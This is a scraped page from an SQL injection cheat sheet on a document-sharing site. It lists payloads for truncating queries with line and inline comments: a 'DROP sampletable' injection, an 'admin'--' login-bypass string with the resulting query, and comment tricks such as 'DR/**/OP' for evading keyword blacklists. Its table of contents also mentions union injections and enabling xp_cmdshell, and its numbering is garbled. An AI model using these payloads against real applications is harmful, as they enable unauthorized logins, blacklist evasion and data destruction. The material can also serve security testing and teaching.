Sql Injection Cheat Sheet Page 2
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
187.
Strings without Quotes
Hex based SQL Injection Samples
8.
String Modification & Related
9.
Union Injections
UNION – Fixing Language Issues
10.
Bypassing Login Screens
11.
Enabling xp_cmdshell in SQL Server 2005
12. Other parts are not so well formatted but check out by yourself, drafts,
notes and stuff, scroll down and see.
Syntax Reference, Sample Attacks and Dirty SQL
Injection Tricks
Ending / Commenting Out / Line Comments
Line Comments
Comments out rest of the query.
Line comments are generally useful for ignoring rest of the query so you don’t have to
deal with fixing the syntax.
•
(SM)
--
DROP sampletable;--
•
(M)
#
DROP sampletable;#
Line Comments Sample SQL Injection Attacks
•
Username:
admin'--
•
SELECT * FROM members WHERE username = 'admin'--' AND password =
'password'
This is going to log you as admin user, because rest of the SQL query will be
ignored.
Inline Comments
Comments out rest of the query by not closing them or you can use for bypassing
blacklisting, removing spaces, obfuscating and determining database versions.
•
(SM)
/*Comment Here*/
•
DROP/*comment*/sampletable
•
DR/**/OP/*bypass blacklisting*/sampletable
•
SELECT/*avoid-spaces*/password/**/FROM/**/Members
•
/ (M)
/*! MYSQL Special SQL *
This is a special comment syntax for MySQL. It’s perfect for detecting MySQL
version. If you put a code into this comments it’s going to execute in MySQL
only. Also you can use this to execute some code only if the server is higher than
supplied version.
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education